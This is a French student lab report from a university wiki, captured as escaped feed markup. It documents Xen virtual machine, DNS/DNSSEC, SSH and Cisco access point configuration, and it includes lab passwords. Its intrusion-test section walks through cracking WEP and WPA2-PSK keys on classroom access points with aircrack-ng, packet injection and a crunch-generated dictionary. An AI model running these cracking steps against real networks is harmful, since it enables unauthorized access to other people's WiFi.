|}&lt;br /&gt;
&lt;br /&gt;
= Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
Configuration du SSH &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
Configuration du DNS :&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.site&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   193.48.57.0/24 ;&lt;br /&gt;
 };&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
 @       IN      SOA     ns1.paixdieu.site. postmaster.paixdieu.site. (&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.paixdieu.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.177&lt;br /&gt;
 www     IN      A       193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Pour tester le bon fonctionnement du serveur DNS, nous utilisons la commande :&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;host -t any paixdieu.site localhost&lt;br /&gt;
&lt;br /&gt;
Résultat, cela fonctionne bien :&lt;br /&gt;
&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: localhost&lt;br /&gt;
 Address: 127.0.0.1#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 paixdieu.site has SOA record ns1.paixdieu.site. postmaster.paixdieu.site. 4 604800 86400 2419200 604800&lt;br /&gt;
 paixdieu.site name server ns6.gandi.net.&lt;br /&gt;
 paixdieu.site name server ns1.paixdieu.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite procéder à la création des certificats SSL.&lt;br /&gt;
Nous sommes donc aller sur Gandi, acheter un certificat.&lt;br /&gt;
Pour cela nous avons généré un CSR avec la commande :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout paixdieu.site.key -out paixdieu.site.csr&lt;br /&gt;
&lt;br /&gt;
-newkey tsa:2048 permet de générer une requête CSR et une clé privée utilisant le chiffrement RSA sur 2048 bits.&lt;br /&gt;
&lt;br /&gt;
-keyout paixdieu.site.key permet de sauvegarder le fichier de clé privée sous le nom &amp;quot;paixdieu.site.key&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
-out paixdieu.csr permet de sauvegarder le fichier CSR sous le nom &amp;quot;paixdieu.csr&amp;quot;. &lt;br /&gt;
&lt;br /&gt;
Lors du paramètrage, nous avons bien fait attention à rentrer &amp;quot;paixdieu.site&amp;quot; comme common name pour que le certificat soit validé par gandi.&lt;br /&gt;
Cela se fait en copant le contenu de paixdieu.site.csr dans la fenêtre correspondante lors de l'achat du certificat.&lt;br /&gt;
&lt;br /&gt;
Afin de bien sauvegarder les fichiers utilisés, nous les avvons sauvegarder dans le dossier suivant:&lt;br /&gt;
 ~/save_dns/paixdieu.site.csr&lt;br /&gt;
 ~/save_dns/paixdieu.site.key&lt;br /&gt;
&lt;br /&gt;
'''4.4 Sécurisation de serveur DNS par DNSSEC'''&lt;br /&gt;
&lt;br /&gt;
1. Activer DNSSEC&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.options on ajoute les lignes :&lt;br /&gt;
 dnssec-validation yes;&lt;br /&gt;
 dnssec-enable yes;&lt;br /&gt;
 dnssec-lookaside auto;&lt;br /&gt;
&lt;br /&gt;
On crée un répertoire /etc/bind/paixdieu.site.dnssed/&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone &lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE paixdieu.site&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite, on crée la clé asymétrique de la zone pour signer les enregistrements :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.key paixdieu.site-ksk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.private paixdieu.site-ksk.private&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.key paixdieu.site-zsk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.private paixdieu.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
On les inclue à la suite de /etc/bind/db.paixdieu.site&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-ksk.key&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Puis incrémente le numéro de série (5=&amp;gt;6)&lt;br /&gt;
&lt;br /&gt;
On signe des enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o paixdieu.site -k paixdieu.site-ksk ../db.paixdieu.site paixdieu.site-zsk&lt;br /&gt;
&lt;br /&gt;
Prise en compte du fichier signé&lt;br /&gt;
  &lt;br /&gt;
On modifie le fichier /etc/bind/named.conf.local de la manière suivante :&lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/db.paixdieu.site.signed&amp;quot;;&lt;br /&gt;
	allow-transfer {217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Pour finir, nous allons sur gandi.net, sur notre nom de domaine dans DNSSEC et nous ajoutons les deux clefs (zsk et ksk avec l'algorithme 5 (RSA/SHA-1).&lt;br /&gt;
Et nous vérifions la bon fonctionnement du DNSSEC de la manière suivante :&lt;br /&gt;
 &amp;gt; dnssec-verify -o paixdieu.site db.paixdieu.site.signed&lt;br /&gt;
&lt;br /&gt;
 Loading zone 'paixdieu.site' from file 'db.paixdieu.site.signed'&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms:&lt;br /&gt;
 - RSASHA1&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
'''5.5  Intrusion sur un serveur d’application Web'''&lt;br /&gt;
[[Fichier:Wiki intrusion 5.5.zip]]&lt;br /&gt;
&lt;br /&gt;
= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom du point d'accès connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Sources : &lt;br /&gt;
- https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
- https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau006.html#sec29&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en root (mdp : Cisco si par défaut)&lt;br /&gt;
 conf t &lt;br /&gt;
 hostname wifi-ima5sc-e304 =&amp;gt; (optionnel) on donne un nom à notre point d'accès&lt;br /&gt;
 ip domain-name plil.info =&amp;gt; ajoute un nom de domaine (utilisé pour la création de certificats)&lt;br /&gt;
 &lt;br /&gt;
Activation du ssh :&lt;br /&gt;
 &lt;br /&gt;
 crypto key generate rsa general-keys modulus 2048 =&amp;gt; Génération clés publique/privée &lt;br /&gt;
 ip ssh version 2 =&amp;gt; Activation ssh&lt;br /&gt;
&lt;br /&gt;
Configuration de l'authentification sur le point d'accès :&lt;br /&gt;
&lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_marguerite group radius_marguerite&lt;br /&gt;
 radius-server host 193.48.57.177 auth-port 1812 acct-port 1813 key secret_marguerite&lt;br /&gt;
 aaa group server radius radius_marguerite&lt;br /&gt;
 server 193.48.57.177 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 dot11 ssid SSID_MARGUERITE&lt;br /&gt;
 vlan 11&lt;br /&gt;
  authentication open eap eap_marguerite&lt;br /&gt;
  authentication network-eap eap_marguerite&lt;br /&gt;
  authentication key-management wpa&lt;br /&gt;
  mbssid guest-mode&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Association du SSID à l'interface Wi-Fi :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
  encryption vlan 11 mode ciphers aes-ccm tkip&lt;br /&gt;
  ssid SSID_MARGUERITE&lt;br /&gt;
  mbssid&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration du Vlan 11 :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  no ip route-cache&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  bridge-group 11 subscriber-loop-control&lt;br /&gt;
  bridge-group 11 spanning-disabled&lt;br /&gt;
  bridge-group 11 block-unknown-source&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration interface filaire :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'IP du point d'accès et sa Gateway (n'est pas à faire par tous les groupes) :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
  ip default-gateway 10.1.0.2&lt;br /&gt;
  interface BVI 1&lt;br /&gt;
   ip address 10.1.0.4 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
'''Configuration du routeur en e304 :''' &lt;br /&gt;
&lt;br /&gt;
Configuration du VLAN1 :&lt;br /&gt;
  conf t&lt;br /&gt;
  interface vlan 1&lt;br /&gt;
   ip address 10.1.0.2 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Configuration du port sur lequel est branché l'AP en mode trunk : &lt;br /&gt;
&lt;br /&gt;
  conf t&lt;br /&gt;
  interface Gi4/2&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
   switchport trunk allowed vlan add 1&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=57165</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=57165"/>
				<updated>2021-12-16T10:10:40Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
